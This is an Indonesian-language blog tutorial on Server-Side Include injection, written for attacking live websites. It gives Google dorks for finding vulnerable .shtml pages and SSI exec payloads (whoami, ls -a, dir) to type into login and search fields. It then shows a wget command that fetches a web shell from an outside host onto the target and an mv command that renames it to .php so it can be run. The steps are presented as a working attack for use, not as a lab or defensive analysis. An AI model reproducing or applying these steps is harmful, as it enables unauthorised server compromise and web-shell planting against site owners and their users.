Pengertian SSI injection (Server-Side include)
SSI Injection (Server-side Include) adalah teknik mengeksploitasi yang memungkinkan penyerang untuk mengirim kode ke dalam aplikasi web, yang kemudian akan dieksekusi secara lokal oleh web server.
SSI Injection memanfaatkan kegagalan aplikasi Web untuk membersihkan user yang disediakan data sebelum mereka dimasukkan ke dalam sisi-server file HTML.
penyerangan Server-Side Includes memungkinkan eksploitasi aplikasi web dengan memasukkan skrip pada halaman HTML atau mengeksekusi kode sewenang-wenang jarak jauh. Hal ini dapat dieksploitasi melalui manipulasi SSI digunakan dalam aplikasi atau memaksa penggunaannya melalui field input pengguna.
Jika Penyerang melakukan tekhnik SSI maka penyerang dapat menjalankan perintah untuk mendapatkan username dan password.
Ok langsung saja...
pertama" siapkan sesajen
- Rokok
- Kopi
- Lagu" yang bisa membuatmu semangat (jangan lagu Boy Band ntar jadi MAHO)
=================
-=[ step 1 ]=-
=================
bertapa pada Mbah GOOGLE dan berdo'a semoga iblis memberkatimu
Dork:
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
N/b: gunakan kepandaianmu merayu mbah GOOGLE untuk mendapatkan target lebih banyak=================
-=[ Step 2 ]=-
=================
cek web targe-nya VULN ato kagak dengan perintah dibawah ini...
<!--#echo var="DATE_LOCAL" -->
menampilkan tanggal pada website
<!--#exec cmd="whoami"-->
menampilkan user yang sedang berjalan" kehatimu.
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
menampilkan semau file directory web (kagak tau directory MAHO permanen)
<!-- #exec cmd="dir" --> (Windows)
sama kayak diatas tapi ini untuk server windows
=================-=[ Step 3 ]=-
=================
Masukkan Perintah "<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>"
pada kolom pencarian atau di kolom login.
Catatan: masukkan ke dlam kolom login & password perintah tsbt.
=================
-=[ Step 4 ]=-
=================
Upload Shell-mu kedalam web grtisan ato web yg udh ada shell-nya yg ber extensi .TXT
(kagak pernah nyoba yg extensi .PHP ane)
Terus masukkan perintah ini
<!--#exec cmd="wget http://website-yg-ada-shell.com/dir/shell-mu.txt" -->
=================
-=[ Step 5 ]=-
=================
untuk melihat shell.TXT mu berhasil masuk kedalam target ato kagak gunakan perintah
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
apabila shell-mu ada berarty berhasil,,,klo gak ada berarty ya kagak berhasil
apabila berhasil kita ubah extensi shell-mu yg .TXT ke .PHP
menggunakan perintah:
<!--#exec cmd="mv shell.txt shell.php" -->
contoh punya ane:<!--#exec cmd="mv config1.txt config.php" -->
klo berhasil maka akan berubah menjadi .PHPsekarang tinggal eksekusi deh shell-nya
Dan Tara...
empes siap dihidangkan,,, maaf klo tutornya blepotan,,,namanya juga mewbie pool....
Sekian tutorial tentang SSI injection
Semoga Bermanfaat =))
Sumber : http://bluqhk.blogspot.com/2012/09/ssi-injection.html
No comments:
Post a Comment